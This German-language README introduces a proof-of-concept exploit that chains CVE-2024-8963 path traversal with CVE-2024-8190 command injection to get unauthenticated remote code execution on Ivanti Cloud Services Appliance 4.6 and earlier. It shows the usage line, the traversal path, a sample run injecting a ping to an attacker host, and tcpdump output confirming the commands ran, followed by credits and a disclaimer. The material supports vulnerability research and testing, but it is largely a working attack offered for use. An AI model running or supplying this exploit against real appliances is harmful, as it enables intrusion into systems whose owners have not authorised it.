
Kombination von CVE-2024-8963 und CVE-2024-8190 - Für nicht authentifizierte RCE auf Ivanti CSA 4.6 und darunter
Kombination von CVE-2024-8963 & CVE-2024-8190 - PoC für nicht authentifizierte RCE auf Ivanti CSA 4.6 und darunter.
CVE-2024-8963
Pfad-Traversal in Ivanti CSA vor Version 4.6 Patch 519 ermöglicht einem entfernten, nicht authentifizierten Angreifer den Zugriff auf eingeschränkte Funktionalität.
CVE-2024-8190
Eine OS-Befehlseinschleusungssicherheitslücke in Ivanti Cloud Services Appliance Versionen 4.6 Patch 518 und früher ermöglicht einem entfernten authentifizierten Angreifer, Remote-Codeausführung zu erlangen. Der Angreifer muss über Administratorrechte verfügen, um diese Sicherheitslücke auszunutzen.
Dieser PoC kombiniert die beiden, um zu demonstrieren, wie CVE-2024-8190 ohne Authentifizierung genutzt werden kann.
python3 ./cve-2024-8190.py <target_url> '<CMD>'
$ python3 ./cve-2024-8190.py https://<target> 'ping -c 4 <attacker>'
[!] WARNUNG: Dieses Skript ist nur für autorisierte Tests und zu Bildungszwecken bestimmt. Nicht autorisierte Nutzung ist illegal.
[*] Rufe https://<target>/client/index.php%3F.php/gsb/datetime.php ab...
[+] LDCSA_CSRF-Wert erhalten: sid:483045<REMOVED>
[*] Sende Payload...
[!] Zeitüberschreitung der Anfrage. Überprüfen Sie, ob der Befehl auf dem Ziel ausgeführt wurde.
$ sudo tcpdump -n "icmp" -l
11:43:15.135004 IP <target> > <attacker> ICMP echo request, id 30001, seq 1, length 64
11:43:16.135647 IP <target> > <attacker>: ICMP echo request, id 30001, seq 2, length 64
11:43:17.137707 IP <target> > <attacker>: ICMP echo request, id 30001, seq 3, length 64
11:43:18.137085 IP <target> > <attacker>: ICMP echo request, id 30001, seq 4, length 64
Horizon3.ai's CVE-2024-8190 PoC, auf dem dieses stark basiert:
https://github.com/horizon3ai/CVE-2024-8190
ProjectDiscovery's Nuclei-Vorlage für CVE-2024-8963.yaml:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8963.yaml
P.S. ProjectDiscovery ist großartig!
Sei kein Idiot.
Diese Software wurde ausschließlich für akademische Forschungszwecke und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, es sei denn, dies wurde ausdrücklich autorisiert. Die Projektbetreuer übernehmen keine Verantwortung oder Haftung für Missbrauch der Software. Verwenden Sie sie verantwortungsvoll.